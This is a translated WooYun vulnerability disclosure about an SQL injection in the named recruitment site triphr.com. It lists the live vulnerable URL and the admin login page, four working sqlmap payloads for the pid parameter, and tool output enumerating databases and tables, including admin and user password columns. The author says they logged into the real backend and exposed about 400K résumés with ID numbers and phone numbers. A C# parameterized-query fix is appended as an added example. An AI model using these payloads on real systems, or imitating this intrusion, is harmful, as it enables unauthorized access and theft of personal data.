
Vulnerability summary

Defect ID: wooyun-2015-0143366

Title: SQL injection in 中国酒店人才网 (China Hotel Talent Network) can leak 400K users' registration information and résumés (account/password/ID number/email/mobile number)

Vendor: 中国酒店人才网

Author: 路人甲

Submitted: 2015-09-28 10:28

Fix time: 2015-11-12 10:30

Public disclosure: 2015-11-12 10:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 17

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-12: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

See title.

Detailed description:

SQL injection in 中国酒店人才网, leaking a large volume of data: 400K registration records and résumés (account/password/ID number/email/mobile number) + (already inside the site's admin backend). 400K detailed personal résumés can be viewed...
Already obtained an admin account and password and successfully logged into the backend, exposing 400K résumés and 4,000 contract records... Also found that the administrator passwords include weak ones such as "admin". I'm speechless...
398,886 rows in total of personal résumé data; there are also many résumés still unread..
4,614 rows in total of contract information
Link: http://www.triphr.com/college/result.aspx?pid=1
Backend: http://www.triphr.com/Admin_Login.aspx

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=1' AND 9739=9739 AND 'eMNZ'='eMNZ
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pid=1' AND 7902=CONVERT(INT,(CHAR(58) CHAR(100) CHAR(113) CHAR(119) CHAR(58) (SELECT (CASE WHEN (7902=7902) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(102) CHAR(106) CHAR(122) CHAR(58))) AND 'siIg'='siIg
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pid=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pid=1' WAITFOR DELAY '0:0:5'--
---
[10:32:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:32:12] [INFO] fetching database names
[10:32:12] [INFO] the SQL query used returns 6 entries
[10:32:13] [INFO] retrieved: hotel_160uu
[10:32:13] [INFO] retrieved: master
[10:32:13] [INFO] retrieved: model
[10:32:13] [INFO] retrieved: msdb
[10:32:13] [INFO] retrieved: tempdb
[10:32:14] [INFO] retrieved: triphrdb
available databases [6]:
[*] hotel_160uu
[*] master
[*] model
[*] msdb
[*] tempdb
[*] triphrdb
current user: 'hotelhr'
current database: 'triphrdb'
database management system users [2]:
[*] hotelhr
[*] SQL-s-a- OLD HENRY
Database: triphrdb
[59 tables]
+-----------------+
| Administrator |
| Area |
| Area1 |
| B_hangye |
| B_hangyefenlei |
| BizArea |
| BizArea1 |
| CollectTalent |
| College_person |
| Company |
| FriendLink |
| H_Brand |
| InterView |
| Job |
| Link |
| Note |
| Resume |
| ScJObs |
| Site |
| Template |
| UserGroup |
| UserList |
| condition |
| advertise |
| business |
| city |
| class_b |
| cmailSee |
| cmailauto |
| cmailbox |
| college |
| dtproperties |
| email_module |
| fax_module |
| fuwu |
| gongqiu |
| h_list |
| hangye |
| hetong |
| hy_fenlei |
| hy_gangwei |
| jianlirule |
| jiaozhu |
| linkman |
| newsrule |
| province |
| qiyetitle |
| qy_Article |
| qy_ArticleClass |
| qy_waifaMail |
| tempurl |
| tj |
| user_moban |
| yd_Lietou |
| yd_SendMail |
| yd_ads |
| yd_moban |
| zhuanye |
| zy_category |
+-----------------+
Database: triphrdb
Table: Administrator
[19 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| addtime | datetime |
| admin | int |
| cid | int |
| E_mail | nvarchar |
| fax | nvarchar |
| id | int |
| mobile | nvarchar |
| mrname | nvarchar |
| MSN | nvarchar |
| nicheng | nvarchar |
| password | varchar |
| pid | int |
| QQ | nvarchar |
| quanxian | ntext |
| state | int |
| tel | nvarchar |
| username | varchar |
| usertype | int |
| zhiwu | nvarchar |
+----------+----------+
Database: triphrdb
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.yd_SendMail | 2209232 |
| dbo.cmailauto | 2043840 |
| dbo.cmailbox | 1540092 |
| dbo.qy_waifaMail | 574259 |
| dbo.UserList | 476006 |
| dbo.Resume | 398884 |
| dbo.cmailSee | 195607 |
| dbo.gongqiu | 171026 |
| dbo.qy_Article | 93057 |
| dbo.fuwu | 91644 |
| dbo.InterView | 79805 |
| dbo.Job | 67595 |
| dbo.linkman | 53941 |
| dbo.Company | 41776 |
| dbo.business | 34562 |
| dbo.CollectTalent | 20676 |
| dbo.h_list | 10119 |
| dbo.ScJObs | 9907 |
| dbo.hetong | 4614 |
| dbo.Note | 2765 |
| dbo.BizArea | 1276 |
| dbo.BizArea1 | 1276 |
| dbo.Area | 1007 |
| dbo.Area1 | 1007 |
| dbo.college | 719 |
| dbo.city | 541 |
| dbo.hy_gangwei | 408 |
| dbo.zhuanye | 182 |
| dbo.yd_ads | 140 |
| dbo.B_hangyefenlei | 128 |
| dbo.H_Brand | 122 |
| dbo.qy_ArticleClass | 97 |
| dbo.qiyetitle | 68 |
| dbo.newsrule | 48 |
| dbo.hy_fenlei | 36 |
| dbo.province | 35 |
| dbo.advertise | 30 |
| dbo.zy_category | 24 |
| dbo.Template | 23 |
| dbo.email_module | 21 |
| dbo.class_b | 11 |
| dbo.Administrator | 8 |
| dbo.B_hangye | 7 |
| dbo.jianlirule | 7 |
| dbo.hangye | 5 |
| dbo.UserGroup | 4 |
| dbo.Site | 3 |
| dbo.College_person | 2 |
| dbo.yd_moban | 2 |
| dbo.fax_module | 1 |
| dbo.FriendLink | 1 |
| dbo.tj | 1 |
+---------------------+---------+
Database: triphrdb
Table: UserList
[18 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Addtime | datetime |
| addtime1 | datetime |
| Checked | int |
| Email | varchar |
| GroupId | int |
| GroupName | varchar |
| id | int |
| ip | varchar |
| isdfw | tinyint |
| ismail | int |
| LastLogin | datetime |
| Locked | int |
| Logins | int |
| MailActive | int |
| Mailcode | varchar |
| oldid | int |
| UserName | varchar |
| UserPwd | varchar |
+------------+----------+

Proof of vulnerability:

Just look at the screenshots...


Remediation:

You know what to do.
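The fix the author leaves unstated, written out as an added example that is not the site's own code: every sqlmap payload above begins with `pid=1'`, so `result.aspx` evidently splices the raw query-string value into a quoted SQL string. The hardened handler below parses `pid` as an integer and binds it as a typed `SqlParameter`. The table and column names, the `triphr` connection-string name and the `ResultGrid` control are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class Result : Page
{
    // BEFORE (reconstructed assumption, not the site's source): the raw query-string value is
    // spliced into the SQL text inside single quotes, so an input like  1' AND ...  closes the
    // literal and the rest runs as SQL, which is the shape of every sqlmap payload above.
    private static string BuildUnsafeQuery(string pid)
    {
        return "SELECT id, name FROM college WHERE pid = '" + pid + "'";
    }

    // AFTER: parse pid as an integer first, then bind it as a typed SqlParameter. The SQL text
    // is constant, so no input can change its structure, and non-numeric input is refused.
    private static DataTable LoadByPid(string rawPid, string connectionString)
    {
        int pid;
        if (!int.TryParse(rawPid, out pid) || pid <= 0)
            throw new ArgumentException("pid must be a positive integer");
        const string sql = "SELECT id, name FROM college WHERE pid = @pid";
        var table = new DataTable();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pid", SqlDbType.Int).Value = pid;
            conn.Open();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
        }
        return table;
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        // "triphr" is an assumed connection-string name; ResultGrid is an assumed GridView.
        string cs = ConfigurationManager.ConnectionStrings["triphr"].ConnectionString;
        try
        {
            ResultGrid.DataSource = LoadByPid(Request.QueryString["pid"], cs);
            ResultGrid.DataBind();
        }
        catch (ArgumentException)
        {
            Response.StatusCode = 400; // malformed pid: refuse, never echo a database error
        }
    }
}
```

Separately, the stacked-queries result shows the application login (`hotelhr`) could run arbitrary statements, so restricting that account to the SELECT/EXECUTE rights the site actually needs limits what any remaining injection could reach.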

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined